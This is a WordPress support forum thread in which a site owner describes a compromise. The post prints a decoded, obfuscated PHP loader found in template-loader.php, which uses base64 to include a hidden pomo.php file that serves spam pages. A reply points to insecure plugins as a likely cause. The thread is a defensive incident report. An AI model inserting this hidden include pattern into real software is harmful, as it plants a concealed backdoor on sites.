Site Hacked via template-loader.php File

  • I found a big php block full or rot13’s and eval’s which decoded into this:

    $GLOBALS[‘_416406938_’]=Array();
    function _1424099673($i){$a=Array(‘L2hvbWUvcm9yX3BvZGNhc3RfYWRtaW4vcmVzZWFyY2hvbnJlbGlnaW9uLm9yZy93cC1pbmNsdWRlcy9wb21vL3BvbW8ucGhw’);return base64_decode($a[$i]);}
    include_once(_1424099673(0));

    That translates into
    $GLOBALS[‘_416406938_’]=Array();
    include_once(/home/ror_podcast_admin/researchonreligion.org/wp-includes/pomo/pomo.php);

    That file contains more to be decoded which results in a big block of stuff I won’t bother posting which has the effect of creating a bunch of spam landing pages for a bunch of common spam topics like viagra, etc. These pages are loaded from a bunch of encoded/zipped/rot’d files in wp-includes/js/tinymce/plugins/wpgallery/img/xml which appear to have been unzipped from a file called compressed.zip.

    I’d love any info any could provide on how this could have gotten started I’d greatly appreciate it as I had permissions set along the lines of what’s laid out in the Hardening WordPress guidelines and was running at least WordPress 3.2.0 (I can’t remember if I’d updated beyond that).

    Thanks.

Viewing 1 replies (of 1 total)

  • I had permissions set along the lines of what’s laid out in the Hardening WordPress guidelines

    Many times with open source software, while the software itself is very secure, people (that don’t have a background in security) write all sorts of plugins that actually do some pretty amazing things. Even if you tightened all the bolts on your WordPress site, you may be running an insecure plugin.

    Are you running any plugins? You may want to Google your plugin name along with the word “hack” and see if other users are reporting any similar problems.

Viewing 1 replies (of 1 total)
  • The topic ‘Site Hacked via template-loader.php File’ is closed to new replies.